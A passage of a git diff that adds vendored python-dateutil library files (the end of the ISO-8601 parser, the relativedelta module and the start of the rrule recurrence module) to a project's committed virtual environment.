- ``hh:mm`` or ``hhmm`` + - ``hh:mm:ss`` or ``hhmmss`` + - ``hh:mm:ss.ssssss`` (Up to 6 sub-second digits) + + Midnight is a special case for `hh`, as the standard supports both + 00:00 and 24:00 as a representation. The decimal separator can be + either a dot or a comma. + + + .. caution:: + + Support for fractional components other than seconds is part of the + ISO-8601 standard, but is not currently implemented in this parser. + + Supported time zone offset formats are: + + - `Z` (UTC) + - `±HH:MM` + - `±HHMM` + - `±HH` + + Offsets will be represented as :class:`dateutil.tz.tzoffset` objects, + with the exception of UTC, which will be represented as + :class:`dateutil.tz.tzutc`. Time zone offsets equivalent to UTC (such + as `+00:00`) will also be represented as :class:`dateutil.tz.tzutc`. + + :param dt_str: + A string or stream containing only an ISO-8601 datetime string + + :return: + Returns a :class:`datetime.datetime` representing the string. + Unspecified components default to their lowest value. + + .. warning:: + + As of version 2.7.0, the strictness of the parser should not be + considered a stable part of the contract. Any valid ISO-8601 string + that parses correctly with the default settings will continue to + parse correctly in future versions, but invalid strings that + currently fail (e.g. ``2017-01-01T00:00+00:00:00``) are not + guaranteed to continue failing in future versions if they encode + a valid date. + + .. versionadded:: 2.7.0 + """ + components, pos = self._parse_isodate(dt_str) + + if len(dt_str) > pos: + if self._sep is None or dt_str[pos:pos + 1] == self._sep: + components += self._parse_isotime(dt_str[pos + 1:]) + else: + raise ValueError('String contains unknown ISO components') + + if len(components) > 3 and components[3] == 24: + components[3] = 0 + return datetime(*components) + timedelta(days=1) + + return datetime(*components) + + @_takes_ascii + def parse_isodate(self, datestr): + """ + Parse the date portion of an ISO string. + + :param datestr: + The string portion of an ISO string, without a separator + + :return: + Returns a :class:`datetime.date` object + """ + components, pos = self._parse_isodate(datestr) + if pos < len(datestr): + raise ValueError('String contains unknown ISO ' + + 'components: {!r}'.format(datestr.decode('ascii'))) + return date(*components) + + @_takes_ascii + def parse_isotime(self, timestr): + """ + Parse the time portion of an ISO string. + + :param timestr: + The time portion of an ISO string, without a separator + + :return: + Returns a :class:`datetime.time` object + """ + components = self._parse_isotime(timestr) + if components[0] == 24: + components[0] = 0 + return time(*components) + + @_takes_ascii + def parse_tzstr(self, tzstr, zero_as_utc=True): + """ + Parse a valid ISO time zone string. + + See :func:`isoparser.isoparse` for details on supported formats. + + :param tzstr: + A string representing an ISO time zone offset + + :param zero_as_utc: + Whether to return :class:`dateutil.tz.tzutc` for zero-offset zones + + :return: + Returns :class:`dateutil.tz.tzoffset` for offsets and + :class:`dateutil.tz.tzutc` for ``Z`` and (if ``zero_as_utc`` is + specified) offsets equivalent to UTC. + """ + return self._parse_tzstr(tzstr, zero_as_utc=zero_as_utc) + + # Constants + _DATE_SEP = b'-' + _TIME_SEP = b':' + _FRACTION_REGEX = re.compile(b'[\\.,]([0-9]+)') + + def _parse_isodate(self, dt_str): + try: + return self._parse_isodate_common(dt_str) + except ValueError: + return self._parse_isodate_uncommon(dt_str) + + def _parse_isodate_common(self, dt_str): + len_str = len(dt_str) + components = [1, 1, 1] + + if len_str < 4: + raise ValueError('ISO string too short') + + # Year + components[0] = int(dt_str[0:4]) + pos = 4 + if pos >= len_str: + return components, pos + + has_sep = dt_str[pos:pos + 1] == self._DATE_SEP + if has_sep: + pos += 1 + + # Month + if len_str - pos < 2: + raise ValueError('Invalid common month') + + components[1] = int(dt_str[pos:pos + 2]) + pos += 2 + + if pos >= len_str: + if has_sep: + return components, pos + else: + raise ValueError('Invalid ISO format') + + if has_sep: + if dt_str[pos:pos + 1] != self._DATE_SEP: + raise ValueError('Invalid separator in ISO string') + pos += 1 + + # Day + if len_str - pos < 2: + raise ValueError('Invalid common day') + components[2] = int(dt_str[pos:pos + 2]) + return components, pos + 2 + + def _parse_isodate_uncommon(self, dt_str): + if len(dt_str) < 4: + raise ValueError('ISO string too short') + + # All ISO formats start with the year + year = int(dt_str[0:4]) + + has_sep = dt_str[4:5] == self._DATE_SEP + + pos = 4 + has_sep # Skip '-' if it's there + if dt_str[pos:pos + 1] == b'W': + # YYYY-?Www-?D? + pos += 1 + weekno = int(dt_str[pos:pos + 2]) + pos += 2 + + dayno = 1 + if len(dt_str) > pos: + if (dt_str[pos:pos + 1] == self._DATE_SEP) != has_sep: + raise ValueError('Inconsistent use of dash separator') + + pos += has_sep + + dayno = int(dt_str[pos:pos + 1]) + pos += 1 + + base_date = self._calculate_weekdate(year, weekno, dayno) + else: + # YYYYDDD or YYYY-DDD + if len(dt_str) - pos < 3: + raise ValueError('Invalid ordinal day') + + ordinal_day = int(dt_str[pos:pos + 3]) + pos += 3 + + if ordinal_day < 1 or ordinal_day > (365 + calendar.isleap(year)): + raise ValueError('Invalid ordinal day' + + ' {} for year {}'.format(ordinal_day, year)) + + base_date = date(year, 1, 1) + timedelta(days=ordinal_day - 1) + + components = [base_date.year, base_date.month, base_date.day] + return components, pos + + def _calculate_weekdate(self, year, week, day): + """ + Calculate the day of corresponding to the ISO year-week-day calendar. + + This function is effectively the inverse of + :func:`datetime.date.isocalendar`. + + :param year: + The year in the ISO calendar + + :param week: + The week in the ISO calendar - range is [1, 53] + + :param day: + The day in the ISO calendar - range is [1 (MON), 7 (SUN)] + + :return: + Returns a :class:`datetime.date` + """ + if not 0 < week < 54: + raise ValueError('Invalid week: {}'.format(week)) + + if not 0 < day < 8: # Range is 1-7 + raise ValueError('Invalid weekday: {}'.format(day)) + + # Get week 1 for the specific year: + jan_4 = date(year, 1, 4) # Week 1 always has January 4th in it + week_1 = jan_4 - timedelta(days=jan_4.isocalendar()[2] - 1) + + # Now add the specific number of weeks and days to get what we want + week_offset = (week - 1) * 7 + (day - 1) + return week_1 + timedelta(days=week_offset) + + def _parse_isotime(self, timestr): + len_str = len(timestr) + components = [0, 0, 0, 0, None] + pos = 0 + comp = -1 + + if len_str < 2: + raise ValueError('ISO time too short') + + has_sep = False + + while pos < len_str and comp < 5: + comp += 1 + + if timestr[pos:pos + 1] in b'-+Zz': + # Detect time zone boundary + components[-1] = self._parse_tzstr(timestr[pos:]) + pos = len_str + break + + if comp == 1 and timestr[pos:pos+1] == self._TIME_SEP: + has_sep = True + pos += 1 + elif comp == 2 and has_sep: + if timestr[pos:pos+1] != self._TIME_SEP: + raise ValueError('Inconsistent use of colon separator') + pos += 1 + + if comp < 3: + # Hour, minute, second + components[comp] = int(timestr[pos:pos + 2]) + pos += 2 + + if comp == 3: + # Fraction of a second + frac = self._FRACTION_REGEX.match(timestr[pos:]) + if not frac: + continue + + us_str = frac.group(1)[:6] # Truncate to microseconds + components[comp] = int(us_str) * 10**(6 - len(us_str)) + pos += len(frac.group()) + + if pos < len_str: + raise ValueError('Unused components in ISO string') + + if components[0] == 24: + # Standard supports 00:00 and 24:00 as representations of midnight + if any(component != 0 for component in components[1:4]): + raise ValueError('Hour may only be 24 at 24:00:00.000') + + return components + + def _parse_tzstr(self, tzstr, zero_as_utc=True): + if tzstr == b'Z' or tzstr == b'z': + return tz.UTC + + if len(tzstr) not in {3, 5, 6}: + raise ValueError('Time zone offset must be 1, 3, 5 or 6 characters') + + if tzstr[0:1] == b'-': + mult = -1 + elif tzstr[0:1] == b'+': + mult = 1 + else: + raise ValueError('Time zone offset requires sign') + + hours = int(tzstr[1:3]) + if len(tzstr) == 3: + minutes = 0 + else: + minutes = int(tzstr[(4 if tzstr[3:4] == self._TIME_SEP else 3):]) + + if zero_as_utc and hours == 0 and minutes == 0: + return tz.UTC + else: + if minutes > 59: + raise ValueError('Invalid minutes in time zone offset') + + if hours > 23: + raise ValueError('Invalid hours in time zone offset') + + return tz.tzoffset(None, mult * (hours * 60 + minutes) * 60) + + +DEFAULT_ISOPARSER = isoparser() +isoparse = DEFAULT_ISOPARSER.isoparse diff --git a/env/Lib/site-packages/dateutil/relativedelta.py b/env/Lib/site-packages/dateutil/relativedelta.py new file mode 100644 index 00000000..a9e85f7e --- /dev/null +++ b/env/Lib/site-packages/dateutil/relativedelta.py @@ -0,0 +1,599 @@ +# -*- coding: utf-8 -*- +import datetime +import calendar + +import operator +from math import copysign + +from six import integer_types +from warnings import warn + +from ._common import weekday + +MO, TU, WE, TH, FR, SA, SU = weekdays = tuple(weekday(x) for x in range(7)) + +__all__ = ["relativedelta", "MO", "TU", "WE", "TH", "FR", "SA", "SU"] + + +class relativedelta(object): + """ + The relativedelta type is designed to be applied to an existing datetime and + can replace specific components of that datetime, or represents an interval + of time. + + It is based on the specification of the excellent work done by M.-A. Lemburg + in his + `mx.DateTime `_ extension. + However, notice that this type does *NOT* implement the same algorithm as + his work. Do *NOT* expect it to behave like mx.DateTime's counterpart. + + There are two different ways to build a relativedelta instance. The + first one is passing it two date/datetime classes:: + + relativedelta(datetime1, datetime2) + + The second one is passing it any number of the following keyword arguments:: + + relativedelta(arg1=x,arg2=y,arg3=z...) + + year, month, day, hour, minute, second, microsecond: + Absolute information (argument is singular); adding or subtracting a + relativedelta with absolute information does not perform an arithmetic + operation, but rather REPLACES the corresponding value in the + original datetime with the value(s) in relativedelta. + + years, months, weeks, days, hours, minutes, seconds, microseconds: + Relative information, may be negative (argument is plural); adding + or subtracting a relativedelta with relative information performs + the corresponding arithmetic operation on the original datetime value + with the information in the relativedelta. + + weekday: + One of the weekday instances (MO, TU, etc) available in the + relativedelta module. These instances may receive a parameter N, + specifying the Nth weekday, which could be positive or negative + (like MO(+1) or MO(-2)). Not specifying it is the same as specifying + +1. You can also use an integer, where 0=MO. This argument is always + relative e.g. if the calculated date is already Monday, using MO(1) + or MO(-1) won't change the day. To effectively make it absolute, use + it in combination with the day argument (e.g. day=1, MO(1) for first + Monday of the month). + + leapdays: + Will add given days to the date found, if year is a leap + year, and the date found is post 28 of february. + + yearday, nlyearday: + Set the yearday or the non-leap year day (jump leap days). + These are converted to day/month/leapdays information. + + There are relative and absolute forms of the keyword + arguments. The plural is relative, and the singular is + absolute. For each argument in the order below, the absolute form + is applied first (by setting each attribute to that value) and + then the relative form (by adding the value to the attribute). + + The order of attributes considered when this relativedelta is + added to a datetime is: + + 1. Year + 2. Month + 3. Day + 4. Hours + 5. Minutes + 6. Seconds + 7. Microseconds + + Finally, weekday is applied, using the rule described above. + + For example + + >>> from datetime import datetime + >>> from dateutil.relativedelta import relativedelta, MO + >>> dt = datetime(2018, 4, 9, 13, 37, 0) + >>> delta = relativedelta(hours=25, day=1, weekday=MO(1)) + >>> dt + delta + datetime.datetime(2018, 4, 2, 14, 37) + + First, the day is set to 1 (the first of the month), then 25 hours + are added, to get to the 2nd day and 14th hour, finally the + weekday is applied, but since the 2nd is already a Monday there is + no effect. + + """ + + def __init__(self, dt1=None, dt2=None, + years=0, months=0, days=0, leapdays=0, weeks=0, + hours=0, minutes=0, seconds=0, microseconds=0, + year=None, month=None, day=None, weekday=None, + yearday=None, nlyearday=None, + hour=None, minute=None, second=None, microsecond=None): + + if dt1 and dt2: + # datetime is a subclass of date. So both must be date + if not (isinstance(dt1, datetime.date) and + isinstance(dt2, datetime.date)): + raise TypeError("relativedelta only diffs datetime/date") + + # We allow two dates, or two datetimes, so we coerce them to be + # of the same type + if (isinstance(dt1, datetime.datetime) != + isinstance(dt2, datetime.datetime)): + if not isinstance(dt1, datetime.datetime): + dt1 = datetime.datetime.fromordinal(dt1.toordinal()) + elif not isinstance(dt2, datetime.datetime): + dt2 = datetime.datetime.fromordinal(dt2.toordinal()) + + self.years = 0 + self.months = 0 + self.days = 0 + self.leapdays = 0 + self.hours = 0 + self.minutes = 0 + self.seconds = 0 + self.microseconds = 0 + self.year = None + self.month = None + self.day = None + self.weekday = None + self.hour = None + self.minute = None + self.second = None + self.microsecond = None + self._has_time = 0 + + # Get year / month delta between the two + months = (dt1.year - dt2.year) * 12 + (dt1.month - dt2.month) + self._set_months(months) + + # Remove the year/month delta so the timedelta is just well-defined + # time units (seconds, days and microseconds) + dtm = self.__radd__(dt2) + + # If we've overshot our target, make an adjustment + if dt1 < dt2: + compare = operator.gt + increment = 1 + else: + compare = operator.lt + increment = -1 + + while compare(dt1, dtm): + months += increment + self._set_months(months) + dtm = self.__radd__(dt2) + + # Get the timedelta between the "months-adjusted" date and dt1 + delta = dt1 - dtm + self.seconds = delta.seconds + delta.days * 86400 + self.microseconds = delta.microseconds + else: + # Check for non-integer values in integer-only quantities + if any(x is not None and x != int(x) for x in (years, months)): + raise ValueError("Non-integer years and months are " + "ambiguous and not currently supported.") + + # Relative information + self.years = int(years) + self.months = int(months) + self.days = days + weeks * 7 + self.leapdays = leapdays + self.hours = hours + self.minutes = minutes + self.seconds = seconds + self.microseconds = microseconds + + # Absolute information + self.year = year + self.month = month + self.day = day + self.hour = hour + self.minute = minute + self.second = second + self.microsecond = microsecond + + if any(x is not None and int(x) != x + for x in (year, month, day, hour, + minute, second, microsecond)): + # For now we'll deprecate floats - later it'll be an error. + warn("Non-integer value passed as absolute information. " + + "This is not a well-defined condition and will raise " + + "errors in future versions.", DeprecationWarning) + + if isinstance(weekday, integer_types): + self.weekday = weekdays[weekday] + else: + self.weekday = weekday + + yday = 0 + if nlyearday: + yday = nlyearday + elif yearday: + yday = yearday + if yearday > 59: + self.leapdays = -1 + if yday: + ydayidx = [31, 59, 90, 120, 151, 181, 212, + 243, 273, 304, 334, 366] + for idx, ydays in enumerate(ydayidx): + if yday <= ydays: + self.month = idx+1 + if idx == 0: + self.day = yday + else: + self.day = yday-ydayidx[idx-1] + break + else: + raise ValueError("invalid year day (%d)" % yday) + + self._fix() + + def _fix(self): + if abs(self.microseconds) > 999999: + s = _sign(self.microseconds) + div, mod = divmod(self.microseconds * s, 1000000) + self.microseconds = mod * s + self.seconds += div * s + if abs(self.seconds) > 59: + s = _sign(self.seconds) + div, mod = divmod(self.seconds * s, 60) + self.seconds = mod * s + self.minutes += div * s + if abs(self.minutes) > 59: + s = _sign(self.minutes) + div, mod = divmod(self.minutes * s, 60) + self.minutes = mod * s + self.hours += div * s + if abs(self.hours) > 23: + s = _sign(self.hours) + div, mod = divmod(self.hours * s, 24) + self.hours = mod * s + self.days += div * s + if abs(self.months) > 11: + s = _sign(self.months) + div, mod = divmod(self.months * s, 12) + self.months = mod * s + self.years += div * s + if (self.hours or self.minutes or self.seconds or self.microseconds + or self.hour is not None or self.minute is not None or + self.second is not None or self.microsecond is not None): + self._has_time = 1 + else: + self._has_time = 0 + + @property + def weeks(self): + return int(self.days / 7.0) + + @weeks.setter + def weeks(self, value): + self.days = self.days - (self.weeks * 7) + value * 7 + + def _set_months(self, months): + self.months = months + if abs(self.months) > 11: + s = _sign(self.months) + div, mod = divmod(self.months * s, 12) + self.months = mod * s + self.years = div * s + else: + self.years = 0 + + def normalized(self): + """ + Return a version of this object represented entirely using integer + values for the relative attributes. + + >>> relativedelta(days=1.5, hours=2).normalized() + relativedelta(days=+1, hours=+14) + + :return: + Returns a :class:`dateutil.relativedelta.relativedelta` object. + """ + # Cascade remainders down (rounding each to roughly nearest microsecond) + days = int(self.days) + + hours_f = round(self.hours + 24 * (self.days - days), 11) + hours = int(hours_f) + + minutes_f = round(self.minutes + 60 * (hours_f - hours), 10) + minutes = int(minutes_f) + + seconds_f = round(self.seconds + 60 * (minutes_f - minutes), 8) + seconds = int(seconds_f) + + microseconds = round(self.microseconds + 1e6 * (seconds_f - seconds)) + + # Constructor carries overflow back up with call to _fix() + return self.__class__(years=self.years, months=self.months, + days=days, hours=hours, minutes=minutes, + seconds=seconds, microseconds=microseconds, + leapdays=self.leapdays, year=self.year, + month=self.month, day=self.day, + weekday=self.weekday, hour=self.hour, + minute=self.minute, second=self.second, + microsecond=self.microsecond) + + def __add__(self, other): + if isinstance(other, relativedelta): + return self.__class__(years=other.years + self.years, + months=other.months + self.months, + days=other.days + self.days, + hours=other.hours + self.hours, + minutes=other.minutes + self.minutes, + seconds=other.seconds + self.seconds, + microseconds=(other.microseconds + + self.microseconds), + leapdays=other.leapdays or self.leapdays, + year=(other.year if other.year is not None + else self.year), + month=(other.month if other.month is not None + else self.month), + day=(other.day if other.day is not None + else self.day), + weekday=(other.weekday if other.weekday is not None + else self.weekday), + hour=(other.hour if other.hour is not None + else self.hour), + minute=(other.minute if other.minute is not None + else self.minute), + second=(other.second if other.second is not None + else self.second), + microsecond=(other.microsecond if other.microsecond + is not None else + self.microsecond)) + if isinstance(other, datetime.timedelta): + return self.__class__(years=self.years, + months=self.months, + days=self.days + other.days, + hours=self.hours, + minutes=self.minutes, + seconds=self.seconds + other.seconds, + microseconds=self.microseconds + other.microseconds, + leapdays=self.leapdays, + year=self.year, + month=self.month, + day=self.day, + weekday=self.weekday, + hour=self.hour, + minute=self.minute, + second=self.second, + microsecond=self.microsecond) + if not isinstance(other, datetime.date): + return NotImplemented + elif self._has_time and not isinstance(other, datetime.datetime): + other = datetime.datetime.fromordinal(other.toordinal()) + year = (self.year or other.year)+self.years + month = self.month or other.month + if self.months: + assert 1 <= abs(self.months) <= 12 + month += self.months + if month > 12: + year += 1 + month -= 12 + elif month < 1: + year -= 1 + month += 12 + day = min(calendar.monthrange(year, month)[1], + self.day or other.day) + repl = {"year": year, "month": month, "day": day} + for attr in ["hour", "minute", "second", "microsecond"]: + value = getattr(self, attr) + if value is not None: + repl[attr] = value + days = self.days + if self.leapdays and month > 2 and calendar.isleap(year): + days += self.leapdays + ret = (other.replace(**repl) + + datetime.timedelta(days=days, + hours=self.hours, + minutes=self.minutes, + seconds=self.seconds, + microseconds=self.microseconds)) + if self.weekday: + weekday, nth = self.weekday.weekday, self.weekday.n or 1 + jumpdays = (abs(nth) - 1) * 7 + if nth > 0: + jumpdays += (7 - ret.weekday() + weekday) % 7 + else: + jumpdays += (ret.weekday() - weekday) % 7 + jumpdays *= -1 + ret += datetime.timedelta(days=jumpdays) + return ret + + def __radd__(self, other): + return self.__add__(other) + + def __rsub__(self, other): + return self.__neg__().__radd__(other) + + def __sub__(self, other): + if not isinstance(other, relativedelta): + return NotImplemented # In case the other object defines __rsub__ + return self.__class__(years=self.years - other.years, + months=self.months - other.months, + days=self.days - other.days, + hours=self.hours - other.hours, + minutes=self.minutes - other.minutes, + seconds=self.seconds - other.seconds, + microseconds=self.microseconds - other.microseconds, + leapdays=self.leapdays or other.leapdays, + year=(self.year if self.year is not None + else other.year), + month=(self.month if self.month is not None else + other.month), + day=(self.day if self.day is not None else + other.day), + weekday=(self.weekday if self.weekday is not None else + other.weekday), + hour=(self.hour if self.hour is not None else + other.hour), + minute=(self.minute if self.minute is not None else + other.minute), + second=(self.second if self.second is not None else + other.second), + microsecond=(self.microsecond if self.microsecond + is not None else + other.microsecond)) + + def __abs__(self): + return self.__class__(years=abs(self.years), + months=abs(self.months), + days=abs(self.days), + hours=abs(self.hours), + minutes=abs(self.minutes), + seconds=abs(self.seconds), + microseconds=abs(self.microseconds), + leapdays=self.leapdays, + year=self.year, + month=self.month, + day=self.day, + weekday=self.weekday, + hour=self.hour, + minute=self.minute, + second=self.second, + microsecond=self.microsecond) + + def __neg__(self): + return self.__class__(years=-self.years, + months=-self.months, + days=-self.days, + hours=-self.hours, + minutes=-self.minutes, + seconds=-self.seconds, + microseconds=-self.microseconds, + leapdays=self.leapdays, + year=self.year, + month=self.month, + day=self.day, + weekday=self.weekday, + hour=self.hour, + minute=self.minute, + second=self.second, + microsecond=self.microsecond) + + def __bool__(self): + return not (not self.years and + not self.months and + not self.days and + not self.hours and + not self.minutes and + not self.seconds and + not self.microseconds and + not self.leapdays and + self.year is None and + self.month is None and + self.day is None and + self.weekday is None and + self.hour is None and + self.minute is None and + self.second is None and + self.microsecond is None) + # Compatibility with Python 2.x + __nonzero__ = __bool__ + + def __mul__(self, other): + try: + f = float(other) + except TypeError: + return NotImplemented + + return self.__class__(years=int(self.years * f), + months=int(self.months * f), + days=int(self.days * f), + hours=int(self.hours * f), + minutes=int(self.minutes * f), + seconds=int(self.seconds * f), + microseconds=int(self.microseconds * f), + leapdays=self.leapdays, + year=self.year, + month=self.month, + day=self.day, + weekday=self.weekday, + hour=self.hour, + minute=self.minute, + second=self.second, + microsecond=self.microsecond) + + __rmul__ = __mul__ + + def __eq__(self, other): + if not isinstance(other, relativedelta): + return NotImplemented + if self.weekday or other.weekday: + if not self.weekday or not other.weekday: + return False + if self.weekday.weekday != other.weekday.weekday: + return False + n1, n2 = self.weekday.n, other.weekday.n + if n1 != n2 and not ((not n1 or n1 == 1) and (not n2 or n2 == 1)): + return False + return (self.years == other.years and + self.months == other.months and + self.days == other.days and + self.hours == other.hours and + self.minutes == other.minutes and + self.seconds == other.seconds and + self.microseconds == other.microseconds and + self.leapdays == other.leapdays and + self.year == other.year and + self.month == other.month and + self.day == other.day and + self.hour == other.hour and + self.minute == other.minute and + self.second == other.second and + self.microsecond == other.microsecond) + + def __hash__(self): + return hash(( + self.weekday, + self.years, + self.months, + self.days, + self.hours, + self.minutes, + self.seconds, + self.microseconds, + self.leapdays, + self.year, + self.month, + self.day, + self.hour, + self.minute, + self.second, + self.microsecond, + )) + + def __ne__(self, other): + return not self.__eq__(other) + + def __div__(self, other): + try: + reciprocal = 1 / float(other) + except TypeError: + return NotImplemented + + return self.__mul__(reciprocal) + + __truediv__ = __div__ + + def __repr__(self): + l = [] + for attr in ["years", "months", "days", "leapdays", + "hours", "minutes", "seconds", "microseconds"]: + value = getattr(self, attr) + if value: + l.append("{attr}={value:+g}".format(attr=attr, value=value)) + for attr in ["year", "month", "day", "weekday", + "hour", "minute", "second", "microsecond"]: + value = getattr(self, attr) + if value is not None: + l.append("{attr}={value}".format(attr=attr, value=repr(value))) + return "{classname}({attrs})".format(classname=self.__class__.__name__, + attrs=", ".join(l)) + + +def _sign(x): + return int(copysign(1, x)) + +# vim:ts=4:sw=4:et diff --git a/env/Lib/site-packages/dateutil/rrule.py b/env/Lib/site-packages/dateutil/rrule.py new file mode 100644 index 00000000..b3203393 --- /dev/null +++ b/env/Lib/site-packages/dateutil/rrule.py @@ -0,0 +1,1737 @@ +# -*- coding: utf-8 -*- +""" +The rrule module offers a small, complete, and very fast, implementation of +the recurrence rules documented in the +`iCalendar RFC `_, +including support for caching of results. +""" +import calendar +import datetime +import heapq +import itertools +import re +import sys +from functools import wraps +# For warning about deprecation of until and count +from warnings import warn + +from six import advance_iterator, integer_types + +from six.moves import _thread, range + +from ._common import weekday as weekdaybase + +try: + from math import gcd +except ImportError: + from fractions import gcd + +__all__ = ["rrule", "rruleset", "rrulestr", + "YEARLY", "MONTHLY", "WEEKLY", "DAILY", + "HOURLY", "MINUTELY", "SECONDLY", + "MO", "TU", "WE", "TH", "FR", "SA", "SU"] + +# Every mask is 7 days longer to handle cross-year weekly periods. +M366MASK = tuple([1]*31+[2]*29+[3]*31+[4]*30+[5]*31+[6]*30 + + [7]*31+[8]*31+[9]*30+[10]*31+[11]*30+[12]*31+[1]*7) +M365MASK = list(M366MASK) +M29, M30, M31 = list(range(1, 30)), list(range(1, 31)), list(range(1, 32)) +MDAY366MASK = tuple(M31+M29+M31+M30+M31+M30+M31+M31+M30+M31+M30+M31+M31[:7]) +MDAY365MASK = list(MDAY366MASK) +M29, M30, M31 = list(range(-29, 0)), list(range(-30, 0)), list(range(-31, 0)) +NMDAY366MASK = tuple(M31+M29+M31+M30+M31+M30+M31+M31+M30+M31+M30+M31+M31[:7]) +NMDAY365MASK = list(NMDAY366MASK) +M366RANGE = (0, 31, 60, 91, 121, 152, 182, 213, 244, 274, 305, 335, 366) +M365RANGE = (0, 31, 59, 90, 120, 151, 181, 212, 243, 273, 304, 334, 365) +WDAYMASK = [0, 1, 2, 3, 4, 5, 6]*55 +del M29, M30, M31, M365MASK[59], MDAY365MASK[59], NMDAY365MASK[31] +MDAY365MASK = tuple(MDAY365MASK) +M365MASK = tuple(M365MASK) + +FREQNAMES = ['YEARLY', 'MONTHLY', 'WEEKLY', 'DAILY', 'HOURLY', 'MINUTELY', 'SECONDLY'] + +(YEARLY, + MONTHLY, + WEEKLY, + DAILY, + HOURLY, + MINUTELY, + SECONDLY) = list(range(7)) + +# Imported on demand. +easter = None +parser = None + + +class weekday(weekdaybase): + """ + This version of weekday does not allow n = 0. + """ + def __init__(self, wkday, n=None): + if n == 0: + raise ValueError("Can't create weekday with n==0") + + super(weekday, self).__init__(wkday, n) + + +MO, TU, WE, TH, FR, SA, SU = weekdays = tuple(weekday(x) for x in range(7)) + + +def _invalidates_cache(f): + """ + Decorator for rruleset methods which may invalidate the + cached length. + """ + @wraps(f) + def inner_func(self, *args, **kwargs): + rv = f(self, *args, **kwargs) + self._invalidate_cache() + return rv + + return inner_func + + +class rrulebase(object): + def __init__(self, cache=False): + if cache: + self._cache = [] + self._cache_lock = _thread.allocate_lock() + self._invalidate_cache() + else: + self._cache = None + self._cache_complete = False + self._len = None + + def __iter__(self): + if self._cache_complete: + return iter(self._cache) + elif self._cache is None: + return self._iter() + else: + return self._iter_cached() + + def _invalidate_cache(self): + if self._cache is not None: + self._cache = [] + self._cache_complete = False + self._cache_gen = self._iter() + + if self._cache_lock.locked(): + self._cache_lock.release() + + self._len = None + + def _iter_cached(self): + i = 0 + gen = self._cache_gen + cache = self._cache + acquire = self._cache_lock.acquire + release = self._cache_lock.release + while gen: + if i == len(cache): + acquire() + if self._cache_complete: + break + try: + for j in range(10): + cache.append(advance_iterator(gen)) + except StopIteration: + self._cache_gen = gen = None + self._cache_complete = True + break + release() + yield cache[i] + i += 1 + while i < self._len: + yield cache[i] + i += 1 + + def __getitem__(self, item): + if self._cache_complete: + return self._cache[item] + elif isinstance(item, slice): + if item.step and item.step < 0: + return list(iter(self))[item] + else: + return list(itertools.islice(self, + item.start or 0, + item.stop or sys.maxsize, + item.step or 1)) + elif item >= 0: + gen = iter(self) + try: + for i in range(item+1): + res = advance_iterator(gen) + except StopIteration: + raise IndexError + return res + else: + return list(iter(self))[item] + + def __contains__(self, item): + if self._cache_complete: + return item in self._cache + else: + for i in self: + if i == item: + return True + elif i > item: + return False + return False + + # __len__() introduces a large performance penalty. + def count(self): + """ Returns the number of recurrences in this set. It will have go + trough the whole recurrence, if this hasn't been done before. """ + if self._len is None: + for x in self: + pass + return self._len + + def before(self, dt, inc=False): + """ Returns the last recurrence before the given datetime instance. The + inc keyword defines what happens if dt is an occurrence. With + inc=True, if dt itself is an occurrence, it will be returned. """ + if self._cache_complete: + gen = self._cache + else: + gen = self + last = None + if inc: + for i in gen: + if i > dt: + break + last = i + else: + for i in gen: + if i >= dt: + break + last = i + return last + + def after(self, dt, inc=False): + """ Returns the first recurrence after the given datetime instance. The + inc keyword defines what happens if dt is an occurrence. With + inc=True, if dt itself is an occurrence, it will be returned. """ + if self._cache_complete: + gen = self._cache + else: + gen = self + if inc: + for i in gen: + if i >= dt: + return i + else: + for i in gen: + if i > dt: + return i + return None + + def xafter(self, dt, count=None, inc=False): + """ + Generator which yields up to `count` recurrences after the given + datetime instance, equivalent to `after`. + + :param dt: + The datetime at which to start generating recurrences. + + :param count: + The maximum number of recurrences to generate. If `None` (default), + dates are generated until the recurrence rule is exhausted. + + :param inc: + If `dt` is an instance of the rule and `inc` is `True`, it is + included in the output. + + :yields: Yields a sequence of `datetime` objects. + """ + + if self._cache_complete: + gen = self._cache + else: + gen = self + + # Select the comparison function + if inc: + comp = lambda dc, dtc: dc >= dtc + else: + comp = lambda dc, dtc: dc > dtc + + # Generate dates + n = 0 + for d in gen: + if comp(d, dt): + if count is not None: + n += 1 + if n > count: + break + + yield d + + def between(self, after, before, inc=False, count=1): + """ Returns all the occurrences of the rrule between after and before. + The inc keyword defines what happens if after and/or before are + themselves occurrences. With inc=True, they will be included in the + list, if they are found in the recurrence set. """ + if self._cache_complete: + gen = self._cache + else: + gen = self + started = False + l = [] + if inc: + for i in gen: + if i > before: + break + elif not started: + if i >= after: + started = True + l.append(i) + else: + l.append(i) + else: + for i in gen: + if i >= before: + break + elif not started: + if i > after: + started = True + l.append(i) + else: + l.append(i) + return l + + +class rrule(rrulebase): + """ + That's the base of the rrule operation. It accepts all the keywords + defined in the RFC as its constructor parameters (except byday, + which was renamed to byweekday) and more. The constructor prototype is:: + + rrule(freq) + + Where freq must be one of YEARLY, MONTHLY, WEEKLY, DAILY, HOURLY, MINUTELY, + or SECONDLY. + + .. note:: + Per RFC section 3.3.10, recurrence instances falling on invalid dates + and times are ignored rather than coerced: + + Recurrence rules may generate recurrence instances with an invalid + date (e.g., February 30) or nonexistent local time (e.g., 1:30 AM + on a day where the local time is moved forward by an hour at 1:00 + AM). Such recurrence instances MUST be ignored and MUST NOT be + counted as part of the recurrence set. + + This can lead to possibly surprising behavior when, for example, the + start date occurs at the end of the month: + + >>> from dateutil.rrule import rrule, MONTHLY + >>> from datetime import datetime + >>> start_date = datetime(2014, 12, 31) + >>> list(rrule(freq=MONTHLY, count=4, dtstart=start_date)) + ... # doctest: +NORMALIZE_WHITESPACE + [datetime.datetime(2014, 12, 31, 0, 0), + datetime.datetime(2015, 1, 31, 0, 0), + datetime.datetime(2015, 3, 31, 0, 0), + datetime.datetime(2015, 5, 31, 0, 0)] + + Additionally, it supports the following keyword arguments: + + :param dtstart: + The recurrence start. Besides being the base for the recurrence, + missing parameters in the final recurrence instances will also be + extracted from this date. If not given, datetime.now() will be used + instead. + :param interval: + The interval between each freq iteration. For example, when using + YEARLY, an interval of 2 means once every two years, but with HOURLY, + it means once every two hours. The default interval is 1. + :param wkst: + The week start day. Must be one of the MO, TU, WE constants, or an + integer, specifying the first day of the week. This will affect + recurrences based on weekly periods. The default week start is got + from calendar.firstweekday(), and may be modified by + calendar.setfirstweekday(). + :param count: + If given, this determines how many occurrences will be generated. + + .. note:: + As of version 2.5.0, the use of the keyword ``until`` in conjunction + with ``count`` is deprecated, to make sure ``dateutil`` is fully + compliant with `RFC-5545 Sec. 3.3.10 `_. Therefore, ``until`` and ``count`` + **must not** occur in the same call to ``rrule``. 